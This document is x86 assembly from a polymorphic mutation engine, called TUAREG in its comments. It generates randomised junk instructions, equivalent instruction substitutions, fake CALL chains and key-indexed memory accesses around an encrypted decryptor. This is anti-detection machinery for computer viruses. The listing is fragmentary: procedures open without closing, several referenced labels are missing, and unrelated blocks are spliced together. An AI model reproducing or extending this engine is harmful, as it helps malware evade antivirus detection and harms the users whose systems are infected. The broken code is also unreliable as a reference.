or ebx, ebx
jz @@NoRecursives
neg eax
call DoMOVMemValue
call DoRandomGarbage
call DoSUBRegMem
call ReleaseVar
jmp @@End
@@ADDDirect:
mov ebx, eax
or dl, dl
jz @@ADDDirectEAX
cmp ebx, 7Fh
jbe @@ADDDirectByte
cmp ebx, 0FFFFFF80h
jae @@ADDDirectByte
mov ax, 0C081h
@@CommonWithADD1:
or ah, dl
stosw
xchg ebx, eax
stosd
jmp @@End
@@ADDDirectByte:
mov ax, 0C083h
@@CommonWithADD2:
or ah, dl
stosw
xchg ebx, eax
stosb
jmp @@End
@@ADDDirectEAX:
mov al, 05h
stosb
xchg ebx, eax
stosd
jmp @@End
@@SUBDirect:
neg eax
mov ebx, eax
or dl, dl
jz @@SUBDirectEAX
cmp ebx, 7Fh
jbe @@SUBDirectByte
cmp ebx, 0FFFFFF80h
jae @@SUBDirectByte
mov ax, 0E881h
jmp @@CommonWithADD1
@@SUBDirectByte:
mov ax, 0E883h
jmp @@CommonWithADD2
@@SUBDirectEAX:
mov al, 2Dh
stosb
xchg ebx, eax
stosd
jmp @@End
@@SelectINC2:
call RandomFlags
jz @@INC01
js @@NextNoRecurs
jmp @@INC01
@@SelectINC:
call RandomFlags
jz @@INC01
js @@Others
@@INC01: mov al, 40h
jmp @@CommonWithDEC
@@NoRecursives:
cmp eax, 1
jz @@SelectINC2
cmp eax, -1
jz @@SelectDEC2
@@NextNoRecurs:
cmp byte ptr [ebp+FlagNoLEA], 1
jnz @@NoRecursives2
call RandomFlags
jz @@ADDDirect
jmp @@SUBDirect
@@NoRecursives2:
call RandomFlags
jz @@0_
js @@ADDDirect
jmp @@SUBDirect
@@0_: js @@LEA
jmp @@LEA2
@@SelectDEC2:
call RandomFlags
jz @@DEC01
js @@NextNoRecurs
jmp @@DEC01
@@SelectDEC:
call RandomFlags
jz @@DEC01
js @@Others
@@DEC01: mov al, 48h
@@CommonWithDEC:
or al, dl
stosb
;; Flag that we use when making comparisions, since LEA doesn't modify flags
FlagNoLEA db 0
;; This function only makes a XOR Reg,Value. There isn't any work-around to
;; make XORs (well, you can use the fact that a XOR is
;; [(X AND Y) OR (NEG(X) AND NEG(Y)], which it's a bitch to code :).
DoXOR proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectXOR
call GetAndReserveVar
or ebx, ebx
jz @@DirectXOR
call DoMOVMemValue
call DoRandomGarbage
call DoXORRegMem
call ReleaseVar
jmp @@End
@@DirectXOR:
push eax
or dl, dl ; Do we use EAX?
jz @@EAX ; Then use the EAX opcode
mov ax, 0F081h ; Opcode of XOR Reg,Value
or ah, dl ; Bind the register to the opcode
stosw ; Store the opcode
jmp @@J01 ; Jump to continue
@@EAX: mov al, 35h ; Opcode of XOR EAX,Value
stosb ; Store it
@@J01: pop eax ; Get the value to XOR from stack
stosd ; Complete the instruction
@@AdjustMem:
mov ecx, eax ; ECX=Destiny (=EAX)
call Random
and al, 3
jz @@NoRecursives2
mov byte ptr [ebp+@@AdjustTimes], al
call Random
mov edx, eax ; EDX=Initial value
push dword ptr [ebp+@@AdjustTimes]
call DoMOVMemValue ; Move this to [EBX]
pop dword ptr [ebp+@@AdjustTimes]
@@Adj_Loop01:
push dword ptr [ebp+@@AdjustTimes]
call Random
mov esi, eax ; ESI=Number that modifies
@@Adj_Loop02:
call Random
and al, 3
jz @@Adj_Loop02
cmp al, 2
jb @@Adj_ADD
jz @@Adj_XOR
@@Adj_SUB: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@Adj_SUB01
call Random
and al, 0Fh
jnz @@Adj_SUB01
sub edx, [ebp+DecryptKey]
push edx
mov dl, [ebp+KeyRegister]
call DoSUBMemReg
pop edx
jmp @@Adj_Next01
@@Adj_SUB01: sub edx, esi ; Initial=Initial-Random
mov eax, esi
call DoSUBMemValue ; Do SUB [<EBX>],<ESI>
jmp @@Adj_Next01
@@Adj_Next01:
call DoRandomGarbage
pop dword ptr [ebp+@@AdjustTimes]
dec byte ptr [ebp+@@AdjustTimes]
jnz @@Adj_Loop01
@@Adj_Loop03:
call Random
and al, 3
jz @@Adj_Loop03
cmp al, 2
jb @@Adj_FinalADD
jz @@Adj_FinalSUB
@@Adj_FinalXOR:
xor ecx, edx ; EDX=Current value XOR final value
mov eax, ecx
call DoXORMemValue
jmp @@End
@@Adj_FinalADD:
sub ecx, edx
mov eax, ecx
call DoADDMemValue
jmp @@End
@@Adj_FinalSUB:
sub edx, ecx
mov eax, edx
call DoSUBMemValue
jmp @@End
@@AdjustTimes db 0
db 3 dup (0) ; Padding
@@NoRecursives2:
mov eax, ecx
@@NoRecursives:
call RandomFlags
jz @@MOVDirect
jmp @@MOVDirect2
DoADDMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 01
jmp DoXXXWithMemAndReg
DoADDMemReg endp
DoADDRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 03
jmp DoXXXWithMemAndReg
DoADDRegMem endp
DoSUBRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 2Bh
jmp DoXXXWithMemAndReg
DoSUBRegMem endp
DoSUBMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 29h
jmp DoXXXWithMemAndReg
DoSUBMemReg endp
DoXORRegMem proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 33h
jmp DoXXXWithMemAndReg
DoXORRegMem endp
DoXORMemReg proc
mov byte ptr [ebp+OpcodeToUseInXXXFunc], 31h
jmp DoXXXWithMemAndReg
DoXORMemReg endp
OpcodeToUseInXXXFunc db 0
DoADDMemValue proc
pushad
push eax
call Random
mov ecx, eax
pop eax
and cl, 3
jz @@ADD
cmp cl, 2
jb @@ADD2
jz @@SUB
@@SUB2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@SUB
neg eax
push eax
mov ax, 2881h
DoXXXMemValue_Common2:
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@SUB2b
cmp ebx, 0FFFFFF80h
jae @@SUB2b
or ah, 80h
DoXXXMemValue_Common:
pop ecx
stosw
xchg ebx, eax
stosd
xchg ecx, eax
stosd
jmp @@End
@@SUB2b: or ah, 40h
pop ecx
stosw
xchg ebx, eax
stosb
xchg ecx, eax
stosd
jmp @@End
@@SUB: neg eax
push eax
mov ax, 2D81h
jmp DoXXXMemValue_Common
@@ADD: push eax
mov ax, 0581h
jmp DoXXXMemValue_Common
@@ADD2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@ADD
push eax
mov ax, 0081h
jmp DoXXXMemValue_Common2
DoSUBMemValue proc
push eax
neg eax
call DoADDMemValue
pop eax
ret
DoSUBMemValue endp
DoXORMemValue proc
pushad
call RandomFlags
jz @@XOR
@@XOR2: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@XOR
push eax
mov ax, 3081h
jmp DoXXXMemValue_Common2
@@XOR: push eax
mov ax, 3581h
jmp DoXXXMemValue_Common
DoXORMemValue endp
;; This function makes code to move the value of one register to another. This
;; task can be made with:
;; - MOV Reg1,Reg2
;; - LEA Reg1,[Reg2]
;; - PUSH Reg2/Garbage/POP Reg1
;; When calling: DL=Destiny register, DH=Source register
DoMOVRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
call Random
and al, 3
jz @@PUSHPOP
cmp al, 2
jb @@LEA
jz @@MOV
@@MOVMEM: call GetAndReserveVar
or ebx, ebx
jz @@NoRecursives
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoMOVRegMem
call ReleaseVar
jmp @@End
@@PUSHPOP: xchg dh, dl
call DoPUSHReg
call DoRandomGarbage
xchg dh, dl
call DoPOPReg
jmp @@End
@@LEA:
;; Here we make: LEA Reg1,[Reg2]
;; The opcode of instruction LEA is as follows:
;; LEA = 8Dh+ 00(IndexAdding).000(Destiny).000(SourceInBrackets - Not 5)
;; To put EBP in SourceInBrackets, IndexAdding must be 1 or 2.
shl dl, 3 ; Prepare the destiny register to set it to
; the opcode
cmp dh, 5 ; Is the source register EBP?
jz @@LEA_EBP ; If it is, jump
mov ax, 008Dh ; AX=Clean opcode of LEA
or ah, dl ; Set the destiny register
or ah, dh ; Set the register in brackets
stosw ; Store the opcode
jmp @@End ; Jump to return
@@LEA_EBP: mov ax, 458Dh ; Opcode of LEA Reg,[EBP+something]
or ah, dl ; Set the destiny register
stosw ; Store the opcode
xor al, al
stosb ; Store a 0 addition
jmp @@End ; Jump to return
@@NoRecursives:
call RandomFlags
jz @@LEA
jmp @@MOV
EndRecursiveMOVing:
@@End: dec byte ptr [ebp+MOVingRecursLevel]
mov [esp+S_EDI], edi ; Conserve EDI
popad
ret ; Return
DoMOVRegReg endp
MOVingRecursLevel db 0
;; DL=Register to PUSH
DoPUSHReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPUSH
call RandomFlags
jz @@DirectPUSH
call GetAndReserveVar
or ebx, ebx
jz @@DirectPUSH
call DoMOVMemReg
call DoRandomGarbage
call DoPUSHMem
call ReleaseVar
jmp EndRecursiveMOVing
@@DirectPUSH:
mov al, 50h
add al, dl
stosb
jmp EndRecursiveMOVing
DoPUSHReg endp
DoPOPReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@DirectPOP
call GetAndReserveVar
or ebx, ebx
jz @@DirectPOP
call DoPOPMem
call DoRandomGarbage
call DoMOVRegMem
call ReleaseVar
jmp EndRecursiveMOVing
EndOfDoPUSHMem:
@@End: mov [esp+S_EDI], edi
popad
ret
DoPUSHMem endp
DoPOPMem proc
pushad
call RandomFlags
jz @@WithIndex
@@Direct: mov ax, 058Fh
jmp CommonWithDoPUSH2
@@WithIndex: cmp byte ptr [ebp+KeyIsInit], 1
jnz @@Direct
mov ax, 0808Fh
jmp CommonWithDoPUSH
DoPOPMem endp
DoMOVRegMem proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@OtherRandom:
call Random
and al, 3
jz @@OtherRandom
cmp al, 2
jb @@DirectMOV
jz @@DirectMOVIndexed
@@PUSHPOP: call DoPUSHMem
call DoRandomGarbage
call DoPOPReg
jmp EndRecursiveMOVing
@@DirectMOVIndexed:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@DirectMOV
mov ax, 808Bh
CommonMRMDirectMOV2:
or ah, [ebp+KeyRegister]
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@Cont_01
cmp ebx, 0FFFFFF80h
jb CommonMRMDirectMOV
@@Cont_01: and ah, 07h
shl dl, 3
or ah, dl
or ah, 40h
stosw
mov eax, ebx
stosb
jmp EndRecursiveMOVing
@@NoRecursives:
call RandomFlags
jz @@DirectMOV
jmp @@DirectMOVIndexed
DoMOVRegMem endp
DoMOVMemReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
@@OtherRandom:
call Random
and al, 3
jz @@OtherRandom
cmp al, 2
jb @@DirectMOV
jz @@DirectMOVIndexed
@@NoRecursives:
call RandomFlags
jz @@DirectMOV
jmp @@DirectMOVIndexed
DoMOVMemReg endp
;; This constructs a XOR between two registers. As the function DoXOR, it has
;; to be made directly, since there aren't more options to do a XOR. Anyway,
;; we can use two slightly different opcodes to perform that.
;; When we call it: DH=Source register, DL=Destiny register
DoXORRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@Direct
call RandomFlags
jz @@Direct
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoXORRegMem
call ReleaseVar
jmp @@End
EndOfRecursiveMOVing:
@@End: dec byte ptr [ebp+MOVingRecursLevel]
mov [esp+S_EDI], edi
popad
ret
DoXORRegReg endp
DoADDRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@NoRecursives
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoADDRegMem
call ReleaseVar
jmp EndOfRecursiveMOVing
@@NoRecursives:
call RandomFlags
jz @@Direct
jmp @@LEA
DoSUBRegReg proc
pushad
inc byte ptr [ebp+MOVingRecursLevel]
cmp byte ptr [ebp+MOVingRecursLevel], 5
jae @@Direct
call RandomFlags
jz @@Direct
call GetAndReserveVar
or ebx, ebx
jz @@Direct
xchg dh, dl
call DoMOVMemReg
call DoRandomGarbage
xchg dh, dl
call DoSUBRegMem
call ReleaseVar
jmp EndOfRecursiveMOVing
;; This set of three functions are called using RandomCalling to call them
;; in a random order, because the order doesn't matter here. This functions
;; set the initial value to Index1, Index2 and Key registers.
SetIndex2Register proc
mov eax, [ebp+InitialValue] ; Get the initial value
mov dl, [ebp+Index2Register] ; Get Index2Register
call DoMOV ; Make a move operation
call DoRandomGarbage ; Make garbage
ret ; Return
SetIndex2Register endp
KeyIsInit db 0
;; Here it is the most used function of this engine. This function calls up to
;; three times to the function Garbage, which generates a single garbage ins-
;; truction (in the case it doesn't select any recursive type).
DoRandomGarbage proc
push eax
call Random
and eax, 3 ; Get a random number between 0 and 3
call RandomFlags
jz @@Check0
cmp eax, 1
jbe @@End
dec eax
jmp @@Loop
@@Check0: or eax, eax
jz @@End
@@Loop: call Garbage ; Call the main function of garbage
dec eax
jnz @@Loop ; Repeat EAX times
@@End: pop eax ; Restore EAX
ret ; Return
DoRandomGarbage endp
;; The main garbage generator. It can generate garbage of many types, and it
;; can be recursively called (some types of garbage are composed of two or
;; more instructions, so DoRandomGarbage is called between).
Garbage proc
pushad ; Save all
inc byte ptr [ebp+GarbageRecursivity] ; Increase the num-
; ber of active instances of Garbage
cmp byte ptr [ebp+GarbageRecursivity], 5 ; If we are too
jz @@Return ; high on recursive instances, exit
call RandomFlags ; Do we make garbage?
jz @@Make1
js @@Make1
jp @@DontMake
;; Make INC or DEC. This types are only INC Reg32 or INC Reg8
@@INCDEC: call RandomFlags
jc @@INC32 ; Make INC Reg32 with a 75% of probability
js @@INC8 ; Make INC Reg8 with a 25% of probability
@@INC32: call SelectARegisterWithInit ; Get a not-reserved initiali-
mov dl, al ; zed register and save it in DL
call Random
and al, 8 ; Get INC if AL=0 or DEC if AL=8
add al, 40h ; Add opcode mask
add al, dl ; Add register mask
stosb ; Store the opcode
jmp @@Return ; Return
;; 8 bits version
@@INC8: call SelectAReg8 ; Get a 8 bits register
cmp al, 8 ; If there aren't selectable 8 bits regis-
jz @@Make1 ; ters, select another type of garbage
mov dl, al ; Set the register in DL
call Random
and ah, 8 ; Get INC or DEC
add ah, dl ; Set the register in the second opcode
add ah, 0C0h ; Mask the second opcode for "register"
mov al, 0FEh ; AL=Main opcode. This opcode has some
; weird instructions that generate exceptions, since the other
; instructions are only for 32 bits, but you can play with the
; DEBUG and generate instructions like CALL AL (FEh D0h) :)
stosw ; Store the opcode
jmp @@Return ; Return
;; Here we make a memory operation. We can make a read or write, and it can
;; be indexed, using the Key register, since it's the only one that doesn't
;; change its value (at least in this version of the TUAREG).
;; We have to be sure that the used memory addresses exist (even reads), due
;; to the fact that it's protected mode and the memory addresses are 32 bits,
;; not like DOS where we can read from anywhere.
@@MemoryOperation:
call RandomFlags
setz al ; Get a random AX being 0000h, 0001h, 0100h or
sets ah ; 0101h, to set @@MemoryRead and @@Memo32bits
mov word ptr [ebp+@@MemoryRead], ax ; with random 0 or 1
; and use them to construct the garbage instruction
call SelectAnAddressLow ; Get a random read/writing address
; in EBX
call RandomFlags ; Randomly, select the type of instruction
jz @@MW_WithReg ; If ZF, make a read/write with a reg
;; Make: OP [Memory_Address],Value
@@MW_WithValue:
call Random
and ah, 38h ; Get a random operation
cmp ah, 38h ; CMP?
jz @@MW_WV_MOV ; Then, do MOV
mov al, 80h ; Set main opcode
jmp @@MW_Continue01 ; Jump
@@MW_WV_MOV: mov ax, 00C6h ; C6 = Opcode of MOV
@@MW_Continue01:
call RandomFlags ; Indexed?
jz @@MW_WV_NotIndexed
js @@MW_WV_NotIndexed
jc @@MW_WV_Indexed
jp @@MW_WV_NotIndexed
; Select indexed with a (12.5%+6.25%) of probability
;; This is the indexed one. We can do OP Reg,[Reg2+Value] (or the reverse)
@@MW_WV_Indexed:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@MW_WV_NotIndexed ; If it isn't set yet, then make a
; not indexed operation
call RandomFlags
jz @@MW_WV_NotThird
js @@MW_WV_NotThird
or ah, 04h ; Activate third opcode
call RandomFlags
pushf
jz @@MW_WV_Mult_32b
js @@MW_WV_Mult_8b
@@MW_WV_Mult_32b:
inc eax
@@MW_WV_Mult_8b:
stosw
@@MW_WV_RepeatMult:
call Random
and al, 3
jz @@MW_WV_RepeatMult
mov cl, al
mov al, byte ptr [ebp+KeyRegister]
shl al, 3
or al, 5
mov edx, [ebp+DecryptKey]
shl edx, cl
ror cl, 2
or al, cl
stosb
sub ebx, edx
jmp @@MW_WVGb
@@MW_WV_NotThird:
or ah, 80h ; Mask the opcode for dword addition
or ah, byte ptr [ebp+KeyRegister] ; Set the key register
sub ebx, [ebp+DecryptKey] ; Subtract the value of the
; key register to the memory address
jmp @@MW_WV_01 ; Jump to complete the instruction
;; Here we make not indexed operations
@@MW_WV_NotIndexed:
add ah, 5 ; Direct value inside the brackets
@@MW_WV_01:
call RandomFlags
pushf
jz @@MW_WV32b
js @@MW_WV8b ; Select 8 or 32 bits
;; Here we use a random register instead of a value. This time we can make
;; reads or writes (with value we can only do writes). If we write to me-
;; mory, we can use any of the seven general purpose registers. If it's
;; a read, only a not-reserved one.
@@MW_WithReg:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Read or write?
jnz @@MW_WR_80 ; Jump if write
cmp byte ptr [ebp+@@Memo32bits], 1 ; 8 or 32 bits?
jz @@MW_WR_79 ; Jump if 32 bits
;; Here we make OP Reg8,[(Reg+)Value]
call SelectAReg8 ; Select a 8 bits register
cmp al, 8 ; Can we select anyone?
jz @@MemoryOperation ; If not, select another type of op.
jmp @@MW_WR_81 ; Jump and continue
;; Here we make OP Reg32,[(Reg+)Value]
@@MW_WR_79: call SelectARegister ; Select a not-reserved register
jmp @@MW_WR_81 ; Jump and continue
;; Here we make OP [(Reg+)Value],Reg8/32
@@MW_WR_80: call SelectAnyRegisterWithInit ; Select any register, and
; initialize it to a random value if it isn't
; set with a value
@@MW_WR_81: mov dl, al ; Save the register in DL
call Random ; Get an operation
and al, 38h
call RandomFlags ; Select indexed or not
jz @@MW_WR_NotIndexed
js @@MW_WR_NotIndexed
jc @@MW_WR_Indexed
jp @@MW_WR_NotIndexed
;; Here if we use indexation using the Key register
@@MW_WR_Indexed:
cmp byte ptr [ebp+KeyIsInit], 1 ; If the key register
jnz @@MW_WR_NotIndexed ; isn't set with its value, then
; we can't do this, so make a not
; indexed memory operation
call RandomFlags
jz @@MW_WR_NotThird
js @@MW_WR_NotThird
cmp al, 38h ; CMP?
jnz @@MW_WR_99 ; If not, jump
mov al, 88h ; If CMP, substitute it by MOV
@@MW_WR_99:
mov ah, 4h
shl dl, 3
or ah, dl
mov cl, byte ptr [ebp+@@Memo32bits]
add al, cl
mov cl, byte ptr [ebp+@@MemoryRead]
add al, cl
add al, cl
stosw
@@MW_WR_RepeatMult:
call Random
and eax, 3
jz @@MW_WR_RepeatMult
mov ecx, eax
mov eax, 1
shl eax, cl
@@MW_WR_Subtract:
sub ebx, [ebp+DecryptKey]
dec eax
jnz @@MW_WR_Subtract
mov al, [ebp+KeyRegister]
shl al, 3
or al, 5
ror cl, 2
or al, cl
stosb
jmp @@MW_WR_02
@@MW_WR_NotThird:
mov ah, 80h ; Mask with dword addition
or ah, byte ptr [ebp+KeyRegister] ; Put the indexation
; register in the opc.
sub ebx, [ebp+DecryptKey] ; Calculate the addition
shl dl, 3
or ah, dl ; Set the destiny register
cmp al, 38h ; CMP?
jnz @@MW_WR_01 ; If not, jump
mov al, 88h ; If CMP, substitute it by MOV
jmp @@MW_WR_01 ; Jump to continue
;; Here to make with no indexation (direct memory address)
@@MW_WR_NotIndexed:
mov ah, 05h ; Direct value inside brackets
@@MW_WR_Cont01:
shl dl, 3
or ah, dl ; Set the destiny register
cmp al, 38h ; CMP?
jnz @@MW_WR_01 ; If not, avoid
@@MW_WR_MOV:
or dl, dl ; EAX?
jz @@MW_WR_EAX ; Then, use its own opcode for MOV
mov al, 88h ; Substitute CMP by MOV
jmp @@MW_WR_01 ; Jump and continue
@@MW_WR_EAX:
mov al, 0A2h ; AL=Opcode of MOV [Value],AL. From this
; opcode we get the variants
call RandomFlags ; Select 8 or 32 bits
jz @@MW_WR_EAX3 ; Jump if 8 bits
@@MW_WR_EAX2:
inc eax ; Increase opcode to make MOV [Value],EAX
@@MW_WR_EAX3:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Memory read?
jnz @@MW_WR_82 ; If not, jump and continue
sub al, 2 ; Make READ subtracting 2 to the opcode.
; Then we'll make MOV AL/EAX,[Value]
@@MW_WR_82:
stosb ; Store the opcode
jmp @@MW_WR_02 ; Jump to insert the memory address
; Not EAX in the register
@@MW_WR_01:
cmp byte ptr [ebp+@@MemoryRead], 1 ; Memory read?
jnz @@ContinueMW ; If not, continue
cmp byte ptr [ebp+@@Memo32bits], 1 ; 32 bits?
jz @@MW_WR_32b ; If 32 bits, jump
jmp @@MW_WR_8b ; Avoid opcode increment
; Here to memory write
@@ContinueMW: call RandomFlags ; Decide: 8 or 32 bits?
jz @@MW_WR_8b ; If 8, jump
@@MW_WR_32b:
inc eax ; Convert opcode to 32 bits operation from a
@@MW_WR_8b: ; a 8 bits opcode
cmp byte ptr [ebp+@@MemoryRead], 1 ; Read or write?
jnz @@MW_WR_83 ; If write, jump
add al, 2 ; Convert write opcode to read opcode
@@MW_WR_83:
stosw ; Store the opcode
@@MW_WR_02:
mov eax, ebx
stosd ; Store the memory address (or calculated addition)
jmp @@Return ; Jump to return
mov ah, al
add ah, 10h ; Convert the 8 bits opcode to the 32
mov al, 0Fh ; bits one
stosw ; Store it
xchg esi, eax
stosd ; Store the displacement
jmp @@RL_Next06 ; Jump and continue
@@RL_Next05: stosb ; Store the 8 bits opcode
xchg esi, eax
stosb ; Store the displacement
@@RL_Next06: call DoRandomGarbage
mov al, [ebp+@@SelectedRegister]
add al, 58h ; Store POP with the used register
stosb
mov byte ptr [ebp+ImInRandomLoop], 0
jmp @@Return
@@NormalCALL:
cmp dword ptr [ebp+CallsLevel1Ndx], 20h*4
jz @@Make1 ; If we can't do more level 1 calls, do other
; type of garbage
cmp dword ptr [ebp+CallsLevel2Ndx], 20h*4
jz @@Make1 ; If we can't do more level 2 calls, do other
; type of garbage
cmp dword ptr [ebp+CallsLevel3Ndx], 20h*4
jz @@Make1 ; If we can't do more level 3 calls, do other
; type of garbage
cmp byte ptr [ebp+KeyIsInit], 1 ; Is the key register set?
jnz @@Make1 ; If it isn't, then avoid CALLs.
; Explanation: we make first the CALL and quite later
; we code the subroutine itself. Then, we maybe put
; inside the subroutines any indexed memory access,
; for which we need the Key register with its correct
; value. If it isn't set yet, then when call to the
; subroutine we'll use the Key register as index but
; with an unknown value.
call RandomFlags ; Stack entries?
jz @@NoStack
js @@NoStack
; Put stack entries with a 25% of probability
mov byte ptr [ebp+@@WithStack], 1 ; Mark it
call Random
and eax, 3
inc eax ; Get a number between 1 and 4
mov byte ptr [ebp+@@StackEntries], al ; Save this number
mov ecx, eax ; ECX=that number
@@LoopInsertEntries:
mov al, 68h ; Opcode of PUSH Value
stosb ; Store it
@@AnotherValueTypeForStack:
call Random ; Get a random type of value to push
and al, 3
jz @@PushRegister ; AL=0? Then push a register
cmp al, 2
jb @@PushAddress ; AL=1? Then push a memory address
jz @@PushPureRandom ; AL=2? Then push a random dword
@@PushPseudoFlags: ; AL=3? Then push a random < 10000h
call Random ; (like flags)
and eax, 0FFFFh
jmp @@NextStackEntry ; Store value
@@PushAddress:
call SelectAnAddressLow ; Get an address
mov eax, ebx ; Put it into EAX and jump to store it
jmp @@NextStackEntry ; Jump to store it
@@PushRegister:
call SelectAnyRegisterWithInit
dec edi
add al, 50h
stosb
jmp @@ContinueStackEntries
@@PushPureRandom:
call Random ; EAX=Random value
@@NextStackEntry:
cmp eax, 7Fh
jbe @@TwoBytesEntry
cmp eax, 0FFFFFF80h ; Is the value between -80h and 7Fh?
jae @@TwoBytesEntry ; If it is, change the opcode
stosd ; Store the dword
jmp @@ContinueStackEntries ; Jump and continue
@@TwoBytesEntry:
mov byte ptr [edi-1], 6Ah ; Change the opcode by PUSH
stosb ; Packed_Dword_Value and store the value to push
@@ContinueStackEntries:
loop @@LoopInsertEntries ; Loop and make it ECX times
jmp @@ContinueCALL ; Continue the CALL coding
;; Here if we don't use stack
@@NoStack: mov byte ptr [ebp+@@WithStack], 0 ; Set this variable
@@ContinueCALL:
mov al, 0E8h
stosb ; Insert a CALL opcode
movzx ebx, byte ptr [ebp+GarbageRecursivity] ; Get the level
dec ebx ; of the stack
mov ecx, ebx
shl ebx, 5 ; *20h
add ebx, ecx ; *21h
shl ebx, 2 ; *84h, so we get the level multiplied by
; 84h, to use a generic way of setting the
; CALL data into the arrays depending on the
; level
mov ecx, [ebp+ebx+CallsLevel1Ndx] ;Get the index of inser-
;tion
add ecx, ebx ; Add the level*84h
mov dword ptr [ebp+ecx+CallsLevel1], edi ; Set the current
; address into the array for later completion
add dword ptr [ebp+ebx+CallsLevel1Ndx], 4 ; Increase the
; index of insertion
add edi, 4 ; Leave space for the CALL displacement and
; complete it later
cmp byte ptr [ebp+@@WithStack], 1 ; Have we used stack?
jnz @@Return ; If not, finish
mov ax, 0C483h ; AX=Opcode of the instruction ADD ESP,xxx
stosw ; Store the opcode
mov al, byte ptr [ebp+@@StackEntries] ; Get the number to
shl al, 2 ; add to ESP to release the stack
stosb ; Store it
jmp @@Return ; Return
@@Return:
@@DontMake: mov [esp+S_EDI], edi ; Conserve EDI when POPAD
dec byte ptr [ebp+GarbageRecursivity] ; Decrease recursi-
; vity level
popad
ret ; Return completely or just to another running instan-
; ce of Garbage
Garbage endp
call RandomFlags
jz @@MoveToRegForCALL
@@DirectCALLToMem:
call DoMOVMemValue
call DoRandomGarbage
call RandomFlags
jz @@DC_00
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@DC_00
push ebx
mov ax, 10FFh
sub ebx, [ebp+DecryptKey]
cmp ebx, 7Fh
jbe @@DC_01
cmp ebx, 0FFFFFF80h
jae @@DC_01
or ah, 80h
or ah, [ebp+KeyRegister]
stosw
mov eax, ebx
stosd
jmp @@DC_02
@@DC_01: or ah, 40h
or ah, [ebp+KeyRegister]
stosw
mov al, bl
stosb
@@DC_02: pop ebx
@@DC_03: call ReleaseVar
jmp @@Return
@@DC_00: mov ax, 15FFh
stosw
mov eax, ebx
stosd
jmp @@DC_03
@@MoveToRegForCALL:
mov ecx, eax
call RandomFlags
jz @@DirectValueForCALL
call Random
sub ebx, eax
mov byte ptr [ebp+@@PureValue], 0
mov dword ptr [ebp+@@ValueToAdd], eax
jmp @@DVFC_001
@@DirectValueForCALL:
mov byte ptr [ebp+@@PureValue], 1
mov dword ptr [ebp+@@ValueToAdd], 0
@@DVFC_001: call Random
and eax, 3
cmp eax, 2
jz @@DVFC_001
mov dl, [ebp+eax+Index1Register]
cmp dl, 8
jnz @@DVFC_001_
mov dl, [ebp+Index1Register]
@@DVFC_001_: call RandomFlags
jz @@FirstMovReg
@@FirstMovMem:
call RandomFlags
jz @@FMM_PushFirst
mov eax, ecx
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
push ebx
add ebx, [ebp+@@ValueToAdd]
call DoMOVMemValue
pop ebx
call DoRandomGarbage
call DoPUSHReg
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
@@FMM_001: push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoRandomGarbage
mov eax, ebx
call DoMOV
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
jmp @@InsertCALL
@@FMM_PushFirst:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoPUSHReg
call DoRandomGarbage
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
mov eax, ecx
push ebx
add ebx, [ebp+@@ValueToAdd]
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoMOVMemValue
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
pop ebx
jmp @@FMM_001
@@FirstMovReg:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoPUSHReg
call DoRandomGarbage
mov eax, ebx
call DoMOV
call DoRandomGarbage
mov eax, ecx
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
push ebx
add ebx, [ebp+@@ValueToAdd]
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoMOVMemValue
pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
pop ebx
@@InsertCALL:
push dword ptr [ebp+@@PureValue]
push dword ptr [ebp+@@ValueToAdd]
call DoRandomGarbage
